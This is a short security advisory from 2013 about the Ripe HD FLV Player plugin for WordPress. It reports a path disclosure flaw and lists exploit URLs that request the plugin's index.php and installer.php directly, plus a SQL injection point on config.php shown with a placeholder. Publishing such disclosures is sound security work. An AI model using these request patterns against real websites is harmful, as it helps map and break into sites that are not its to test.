Ripe HD FLV Player Plugin for WordPress Multiple Script Direct Request Path Disclosure Vulnerability
Summary
Credit:
The information has been provided by Zikou-16.
Details
Vulnerable Systems:
* Ripe HD FLV Player Plugin for WordPress
Ripe HD FLV Player Plugin for WordPress contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a remote attacker sends a direct request for the index.php and installer.php scripts, which discloses the software’s installation path resulting in a loss of confidentiality. While such information is relatively low risk, it is often useful in carrying out additional, more focused attacks.
#=> Exploit :
——————
1#=> Full Path Disclosure :
http://[target]/[path]/wp-content/plugins/ripe-hd-player/index.php
http://[target]/[path]/wp-content/plugins/ripe-hd-player/installer.php
——-
2#=> SQL Injection
http://[target]/[path]/wp-content/plugins/ripe-hd-player/config.php?id=[SQLi]
Disclosure Timeline:
Disclosure Date:2013-01-19
Exploit Publish Date:2013-01-19